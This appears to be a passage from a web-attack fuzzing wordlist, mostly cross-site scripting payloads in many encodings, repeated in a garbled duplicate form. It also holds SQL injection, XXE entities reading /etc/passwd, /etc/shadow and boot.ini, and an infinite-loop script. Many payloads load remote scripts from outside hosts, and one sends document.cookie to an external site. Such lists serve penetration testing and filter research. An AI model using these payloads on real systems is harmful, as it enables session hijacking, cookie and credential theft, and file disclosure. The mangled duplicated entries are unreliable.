SRC="javas]]><![CDATA[cript:alert('XSS');">]]> <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML> <XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML> <HTML><BODY> <!--[if gte IE 4]> <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> <XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);"> <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"--> <? echo('<SCR)'; <BR SIZE="&{alert('XSS')}"> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert("XSS")> <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> <IMG SRC=javascript:alert('XSS')> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- \";alert('XSS');// </TITLE><SCRIPT>alert("XSS");</SCRIPT> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav	ascript:alert('XSS');"> <IMG SRC="jav
ascript:alert('XSS');"> <IMG SRC="jav
ascript:alert('XSS');"> <IMGSRC="javascript:alert('XSS')"> perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out <IMG SRC="  javascript:alert('XSS');"> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> <SCRIPT SRC=http://ha.ckers.org/xss.js <SCRIPT SRC=//ha.ckers.org/.j> <IMG SRC="javascript:alert('XSS')" <IFRAME SRC=http://ha.ckers.org/scriptlet.html < <<SCRIPT>alert("XSS");//<</SCRIPT> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <SCRIPT>a=/XSS/ <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <A HREF="http://66.102.7.147/">XSS</A> <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> <A HREF="http://1113982867/">XSS</A> <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> <A HREF="http://0102.0146.0007.00000223/">XSS</A> <A HREF="htt p://6	6.000146.0x7.147/">XSS</A> <A HREF="//www.google.com/">XSS</A> <A HREF="//google">XSS</A> <A HREF="http://ha.ckers.org@google">XSS</A> <A HREF="http://google:ha.ckers.org">XSS</A> <A HREF="http://google.com/">XSS</A> <A HREF="http://www.google.com./">XSS</A> <A HREF="javascript:document.location='http://www.google.com/'">XSS</A> <A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A> <script>document.vulnerable=true;</script> <img SRC="jav ascript:document.vulnerable=true;"> <img SRC="javascript:document.vulnerable=true;"> <img SRC="  javascript:document.vulnerable=true;"> <body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;> <<SCRIPT>document.vulnerable=true;//<</SCRIPT> <script <B>document.vulnerable=true;</script> <img SRC="javascript:document.vulnerable=true;" <iframe src="javascript:document.vulnerable=true; < <script>a=/XSS/\ndocument.vulnerable=true;</script> \";document.vulnerable=true;;// </title><SCRIPT>document.vulnerable=true;</script> <input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;"> <body BACKGROUND="javascript:document.vulnerable=true;"> <body ONLOAD=document.vulnerable=true;> <img DYNSRC="javascript:document.vulnerable=true;"> <img LOWSRC="javascript:document.vulnerable=true;"> <bgsound SRC="javascript:document.vulnerable=true;"> <br SIZE="&{document.vulnerable=true}"> <LAYER SRC="javascript:document.vulnerable=true;"></LAYER> <link REL="stylesheet" HREF="javascript:document.vulnerable=true;"> <style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS <img SRC='vbscript:document.vulnerable=true;'> 1script3document.vulnerable=true;1/script3 <meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;"> <meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;"> <IFRAME SRC="javascript:document.vulnerable=true;"></iframe> <FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset> <table BACKGROUND="javascript:document.vulnerable=true;"> <table><TD BACKGROUND="javascript:document.vulnerable=true;"> <div STYLE="background-image: url(javascript:document.vulnerable=true;)"> <div STYLE="background-image: url(javascript:document.vulnerable=true;)"> <div STYLE="width: expression(document.vulnerable=true);"> <style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style> <img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)"> <XSS STYLE="xss:expression(document.vulnerable=true)"> exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'> <style TYPE="text/javascript">document.vulnerable=true;</style> <style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a> <style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style> <!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]--> <base HREF="javascript:document.vulnerable=true;//"> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object> <XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span> <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span> <html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html> <? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?> <meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>"> <head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4- <a href="javascript#document.vulnerable=true;"> <div onmouseover="document.vulnerable=true;"> <img src="javascript:document.vulnerable=true;"> <img dynsrc="javascript:document.vulnerable=true;"> <input type="image" dynsrc="javascript:document.vulnerable=true;"> <bgsound src="javascript:document.vulnerable=true;"> &<script>document.vulnerable=true;</script> &{document.vulnerable=true;}; <img src=&{document.vulnerable=true;};> <link rel="stylesheet" href="javascript:document.vulnerable=true;"> <iframe src="vbscript:document.vulnerable=true;"> <img src="mocha:document.vulnerable=true;"> <img src="livescript:document.vulnerable=true;"> <a href="about:<script>document.vulnerable=true;</script>"> <meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;"> <body onload="document.vulnerable=true;"> <div style="background-image: url(javascript:document.vulnerable=true;);"> <div style="behaviour: url([link to code]);"> <div style="binding: url([link to code]);"> <div style="width: expression(document.vulnerable=true;);"> <style type="text/javascript">document.vulnerable=true;</style> <object classid="clsid:..." codebase="javascript:document.vulnerable=true;"> <style><!--</style><script>document.vulnerable=true;//--></script> <<script>document.vulnerable=true;</script> <![<!--]]<script>document.vulnerable=true;//--></script> <!-- -- --><script>document.vulnerable=true;</script><!-- -- --> <img src="blah"onmouseover="document.vulnerable=true;"> <img src="blah>" onmouseover="document.vulnerable=true;"> <xml src="javascript:document.vulnerable=true;"> <xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml> <div datafld="b" dataformatas="html" datasrc="#X"></div> [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script> <style>@import'http://www.securitycompass.com/xss.css';</style> <meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet"> <style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style> <OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object> <HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html> <script SRC="http://www.securitycompass.com/xss.jpg"></script> <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"--> <script a=">" SRC="http://www.securitycompass.com/xss.js"></script> <script =">" SRC="http://www.securitycompass.com/xss.js"></script> <script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script> <script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script> <script a=`>` SRC="http://www.securitycompass.com/xss.js"></script> <script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script> <script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script> <div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla] "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> </script><script>alert(1)</script> </br style=a:expression(alert())> <scrscriptipt>alert(1)</scrscriptipt> <br size=\"&{alert('XSS')}\"> perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> <~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)> <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> <~/XSS STYLE=xss:expression(alert('XSS'))> "><script>alert('XSS')</script> </XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> XSS STYLE=xss:e/**/xpression(alert('XSS'))> </XSS STYLE=xss:expression(alert('XSS'))> ';;alert(String.fromCharCode(88,83,83))//\';;alert(String.fromCharCode(88,83,83))//";;alert(String.fromCharCode(88,83,83))//\";;alert(String.fromCharCode(88,83,83))//-->;<;/SCRIPT>;";>;';>;<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>; ';';;!--";<;XSS>;=&;{()} <;SCRIPT>;alert(';XSS';)<;/SCRIPT>; <;SCRIPT SRC=http://ha.ckers.org/xss.js>;<;/SCRIPT>; <;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>; <;BASE HREF=";javascript:alert(';XSS';);//";>; <;BGSOUND SRC=";javascript:alert(';XSS';);";>; <;BODY BACKGROUND=";javascript:alert(';XSS';);";>; <;BODY ONLOAD=alert(';XSS';)>; <;DIV STYLE=";background-image: url(javascript:alert(';XSS';))";>; <;DIV STYLE=";background-image: url(&;#1;javascript:alert(';XSS';))";>; <;DIV STYLE=";width: expression(alert(';XSS';));";>; <;FRAMESET>;<;FRAME SRC=";javascript:alert(';XSS';);";>;<;/FRAMESET>; <;IFRAME SRC=";javascript:alert(';XSS';);";>;<;/IFRAME>; <;INPUT TYPE=";IMAGE"; SRC=";javascript:alert(';XSS';);";>; <;IMG SRC=";javascript:alert(';XSS';);";>; <;IMG SRC=javascript:alert(';XSS';)>; <;IMG DYNSRC=";javascript:alert(';XSS';);";>; <;IMG LOWSRC=";javascript:alert(';XSS';);";>; <;IMG SRC=";http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode";>; Redirect 302 /a.jpg http://victimsite.com/admin.asp&;deleteuser exp/*<;XSS STYLE=';no\xss:noxss(";*//*";); <;STYLE>;li {list-style-image: url(";javascript:alert('XSS')";);}<;/STYLE>;<;UL>;<;LI>;XSS <;IMG SRC=';vbscript:msgbox(";XSS";)';>; <;LAYER SRC=";http://ha.ckers.org/scriptlet.html";>;<;/LAYER>; <;IMG SRC=";livescript:[code]";>; %BCscript%BEalert(%A2XSS%A2)%BC/script%BE <;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=javascript:alert(';XSS';);";>; <;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K";>; <;META HTTP-EQUIV=";refresh"; CONTENT=";0; URL=http://;URL=javascript:alert(';XSS';);";>; <;IMG SRC=";mocha:[code]";>; <;OBJECT TYPE=";text/x-scriptlet"; DATA=";http://ha.ckers.org/scriptlet.html";>;<;/OBJECT>; <;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>;<;param name=url value=javascript:alert(';XSS';)>;<;/OBJECT>; <;EMBED SRC=";http://ha.ckers.org/xss.swf"; AllowScriptAccess=";always";>;<;/EMBED>; a=";get";;&;#10;b=";URL(";";;&;#10;c=";javascript:";;&;#10;d=";alert(';XSS';);";)";;eval(a+b+c+d); <;STYLE TYPE=";text/javascript";>;alert(';XSS';);<;/STYLE>; <;IMG STYLE=";xss:expr/*XSS*/ession(alert(';XSS';))";>; <;XSS STYLE=";xss:expression(alert(';XSS';))";>; <;STYLE>;.XSS{background-image:url(";javascript:alert(';XSS';)";);}<;/STYLE>;<;A CLASS=XSS>;<;/A>; <;STYLE type=";text/css";>;BODY{background:url(";javascript:alert(';XSS';)";)}<;/STYLE>; <;LINK REL=";stylesheet"; HREF=";javascript:alert(';XSS';);";>; <;LINK REL=";stylesheet"; HREF=";http://ha.ckers.org/xss.css";>; <;STYLE>;@import';http://ha.ckers.org/xss.css';;<;/STYLE>; <;META HTTP-EQUIV=";Link"; Content=";<;http://ha.ckers.org/xss.css>;; REL=stylesheet";>; <;STYLE>;BODY{-moz-binding:url(";http://ha.ckers.org/xssmoz.xml#xss";)}<;/STYLE>; <;TABLE BACKGROUND=";javascript:alert(';XSS';)";>;<;/TABLE>; <;TABLE>;<;TD BACKGROUND=";javascript:alert(';XSS';)";>;<;/TD>;<;/TABLE>; <;HTML xmlns:xss>; <;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=";javas]]>;<;![CDATA[cript:alert(';XSS';);";>;]]>; <;XML ID=";xss";>;<;I>;<;B>;<;IMG SRC=";javas<;!-- -->;cript:alert(';XSS';)";>;<;/B>;<;/I>;<;/XML>; <;XML SRC=";http://ha.ckers.org/xsstest.xml"; ID=I>;<;/XML>; <;HTML>;<;BODY>; <;!--[if gte IE 4]>; <;META HTTP-EQUIV=";Set-Cookie"; Content=";USERID=<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;";>; <;XSS STYLE=";behavior: url(http://ha.ckers.org/xss.htc);";>; <;SCRIPT SRC=";http://ha.ckers.org/xss.jpg";>;<;/SCRIPT>; <;!--#exec cmd=";/bin/echo ';<;SCRIPT SRC';";-->;<;!--#exec cmd=";/bin/echo ';=http://ha.ckers.org/xss.js>;<;/SCRIPT>;';";-->; <;? echo(';<;SCR)';; <;BR SIZE=";&;{alert(';XSS';)}";>; <;IMG SRC=JaVaScRiPt:alert(';XSS';)>; <;IMG SRC=javascript:alert(&;quot;XSS&;quot;)>; <;IMG SRC=`javascript:alert(";RSnake says, ';XSS';";)`>; <;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>; <;IMG RC=&;#106;&;#97;&;#118;&;#97;&;#115;&;#99;&;#114;&;#105;&;#112;&;#116;&;#58;&;#97;&;#108;&;#101;&;#114;&;#116;&;#40;&;#39;&;#88;&;#83;&;#83;&;#39;&;#41;>; <;IMG RC=&;#0000106&;#0000097&;#0000118&;#0000097&;#0000115&;#0000099&;#0000114&;#0000105&;#0000112&;#0000116&;#0000058&;#0000097&;#0000108&;#0000101&;#0000114&;#0000116&;#0000040&;#0000039&;#0000088&;#0000083&;#0000083&;#0000039&;#0000041>; <;DIV STYLE=";background-image:\0075\0072\006C\0028';\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.10530053\0027\0029';\0029";>; <;IMG SRC=&;#x6A&;#x61&;#x76&;#x61&;#x73&;#x63&;#x72&;#x69&;#x70&;#x74&;#x3A&;#x61&;#x6C&;#x65&;#x72&;#x74&;#x28&;#x27&;#x58&;#x53&;#x53&;#x27&;#x29>; <;HEAD>;<;META HTTP-EQUIV=";CONTENT-TYPE"; CONTENT=";text/html; charset=UTF-7";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert(';XSS';);+ADw-/SCRIPT+AD4- \";;alert(';XSS';);// <;/TITLE>;<;SCRIPT>;alert("XSS");<;/SCRIPT>; <;STYLE>;@im\port';\ja\vasc\ript:alert(";XSS";)';;<;/STYLE>; <;IMG SRC=";jav ascript:alert(';XSS';);";>; <;IMG SRC=";jav&;#x09;ascript:alert(';XSS';);";>; <;IMG SRC=";jav&;#x0A;ascript:alert(';XSS';);";>; <;IMG SRC=";jav&;#x0D;ascript:alert(';XSS';);";>; <;IMGSRC=";javascript:alert';XSS';)";>; perl -e ';print ";<;IM SRC=java\0script:alert(";XSS";)>";;';>; out perl -e ';print ";&;<;SCR\0IPT>;alert(";XSS";)<;/SCR\0IPT>;";;'; >; out <;IMG SRC="; &;#14; javascript:alert(';XSS';);";>; <;SCRIPT/XSS SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>; <;SCRIPT SRC=http://ha.ckers.org/xss.js <;SCRIPT SRC=//ha.ckers.org/.j>; <;IMG SRC=";javascript:alert(';XSS';)"; <;IFRAME SRC=http://ha.ckers.org/scriptlet.html <; <;<;SCRIPT>;alert(";XSS";);//<;<;/SCRIPT>; <;IMG ";";";>;<;SCRIPT>;alert(";XSS";)<;/SCRIPT>;";>; <;SCRIPT>;a=/XSS/ <;SCRIPT a=";>;"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;SCRIPT =";blah"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;SCRIPT a=";blah"; ';'; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;SCRIPT ";a=';>;';"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;SCRIPT a=`>;` SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;SCRIPT>;document.write(";<;SCRI";);<;/SCRIPT>;PT SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;SCRIPT a=";>';>"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;A HREF=";http://66.102.7.147/";>;XSS<;/A>; <;A HREF=";http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D";>;XSS<;/A>; <;A HREF=";http://1113982867/";>;XSS<;/A>; <;A HREF=";http://0x42.0x0000066.0x7.0x93/";>;XSS<;/A>; <;A HREF=";http://0102.0146.0007.00000223/";>;XSS<;/A>; <;A HREF=";htt p://6&;#09;6.000146.0x7.147/";>;XSS<;/A>; <;A HREF=";//www.google.com/";>;XSS<;/A>; <;A HREF=";//google";>;XSS<;/A>; <;A HREF=";http://ha.ckers.org@google";>;XSS<;/A>; <;A HREF=";http://google:ha.ckers.org";>;XSS<;/A>; <;A HREF=";http://google.com/";>;XSS<;/A>; <;A HREF=";http://www.google.com./";>;XSS<;/A>; <;A HREF=";javascript:document.location=';http://www.google.com/';";>;XSS<;/A>; <;A HREF=";http://www.gohttp://www.google.com/ogle.com/";>;XSS<;/A>; <script>document.vulnerable=true;</script> <img SRC="jav ascript:document.vulnerable=true;"> <img SRC="javascript:document.vulnerable=true;"> <img SRC="  javascript:document.vulnerable=true;"> <body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;> <<SCRIPT>document.vulnerable=true;//<</SCRIPT> <script <B>document.vulnerable=true;</script> <img SRC="javascript:document.vulnerable=true;" <iframe src="javascript:document.vulnerable=true; < <script>a=/XSS/\ndocument.vulnerable=true;</script> \";document.vulnerable=true;;// </title><SCRIPT>document.vulnerable=true;</script> <input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;"> <body BACKGROUND="javascript:document.vulnerable=true;"> <body ONLOAD=document.vulnerable=true;> <img DYNSRC="javascript:document.vulnerable=true;"> <img LOWSRC="javascript:document.vulnerable=true;"> <bgsound SRC="javascript:document.vulnerable=true;"> <br SIZE="&{document.vulnerable=true}"> <LAYER SRC="javascript:document.vulnerable=true;"></LAYER> <link REL="stylesheet" HREF="javascript:document.vulnerable=true;"> <style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS <img SRC='vbscript:document.vulnerable=true;'> 1script3document.vulnerable=true;1/script3 <meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;"> <meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;"> <IFRAME SRC="javascript:document.vulnerable=true;"></iframe> <FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset> <table BACKGROUND="javascript:document.vulnerable=true;"> <table><TD BACKGROUND="javascript:document.vulnerable=true;"> <div STYLE="background-image: url(javascript:document.vulnerable=true;)"> <div STYLE="background-image: url(javascript:document.vulnerable=true;)"> <div STYLE="width: expression(document.vulnerable=true);"> <style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style> <img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)"> <XSS STYLE="xss:expression(document.vulnerable=true)"> exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'> <style TYPE="text/javascript">document.vulnerable=true;</style> <style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a> <style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style> <!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]--> <base HREF="javascript:document.vulnerable=true;//"> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object> <XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span> <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span> <html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html> <? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?> <meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>"> <head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4- <a href="javascript#document.vulnerable=true;"> <div onmouseover="document.vulnerable=true;"> <img src="javascript:document.vulnerable=true;"> <img dynsrc="javascript:document.vulnerable=true;"> <input type="image" dynsrc="javascript:document.vulnerable=true;"> <bgsound src="javascript:document.vulnerable=true;"> &<script>document.vulnerable=true;</script> &{document.vulnerable=true;}; <img src=&{document.vulnerable=true;};> <link rel="stylesheet" href="javascript:document.vulnerable=true;"> <iframe src="vbscript:document.vulnerable=true;"> <img src="mocha:document.vulnerable=true;"> <img src="livescript:document.vulnerable=true;"> <a href="about:<script>document.vulnerable=true;</script>"> <meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;"> <body onload="document.vulnerable=true;"> <div style="background-image: url(javascript:document.vulnerable=true;);"> <div style="behaviour: url([link to code]);"> <div style="binding: url([link to code]);"> <div style="width: expression(document.vulnerable=true;);"> <style type="text/javascript">document.vulnerable=true;</style> <object classid="clsid:..." codebase="javascript:document.vulnerable=true;"> <style><!--</style><script>document.vulnerable=true;//--></script> <<script>document.vulnerable=true;</script> <![<!--]]<script>document.vulnerable=true;//--></script> <!-- -- --><script>document.vulnerable=true;</script><!-- -- --> <img src="blah"onmouseover="document.vulnerable=true;"> <img src="blah>" onmouseover="document.vulnerable=true;"> <xml src="javascript:document.vulnerable=true;"> <xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml> <div datafld="b" dataformatas="html" datasrc="#X"></div> [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script> <style>@import'http://www.securitycompass.com/xss.css';</style> <meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet"> <style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style> <OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object> <HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html> <script SRC="http://www.securitycompass.com/xss.jpg"></script> <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"--> <script a=">" SRC="http://www.securitycompass.com/xss.js"></script> <script =">" SRC="http://www.securitycompass.com/xss.js"></script> <script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script> <script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script> <script a=`>` SRC="http://www.securitycompass.com/xss.js"></script> <script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script> <script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script> <div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla] ";>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>; <;/script>;<;script>;alert(1)<;/script>; <;/br style=a:expression(alert())>; <;scrscriptipt>;alert(1)<;/scrscriptipt>; <;br size=\";&;{alert('XSS')}\";>; perl -e 'print \";<;IMG SRC=java\0script:alert(\";XSS\";)>;\";;' >; out perl -e 'print \";<;SCR\0IPT>;alert(\";XSS\";)<;/SCR\0IPT>;\";;' >; out <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> <~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)> <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> <~/XSS STYLE=xss:expression(alert('XSS'))> "><script>alert('XSS')</script> </XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> XSS STYLE=xss:e/**/xpression(alert('XSS'))> </XSS STYLE=xss:expression(alert('XSS'))> >"><script>alert("XSS")</script>& "><STYLE>@import"javascript:alert('XSS')";</STYLE> >"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)> >%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22> '%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e' "> >" '';!--"<XSS>=&{()} <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=JaVaScRiPt:alert("XSS<WBR>")> <IMGSRC=java&<WBR>#115;crip&<WBR>#116;:ale&<WBR>#114;t('XS<WBR>;S')> <IMGSRC=ja&<WBR>#0000118as&<WBR>#0000099ri&<WBR>#0000112t:&<WBR>#0000097le&<WBR>#0000114t(&<WBR>#0000039XS&<WBR>#0000083')> <IMGSRC=javas&<WBR>#x63ript:&<WBR>#x61lert(&<WBR>#x27XSS')> <IMG SRC="javascript:alert(<WBR>'XSS');"> <IMG SRC="javascript:alert(<WBR>'XSS');"> <![CDATA[<script>var n=0;while(true){n++;}</script>]]> <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo> <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foof> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xee;</foo> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xee;</foo> 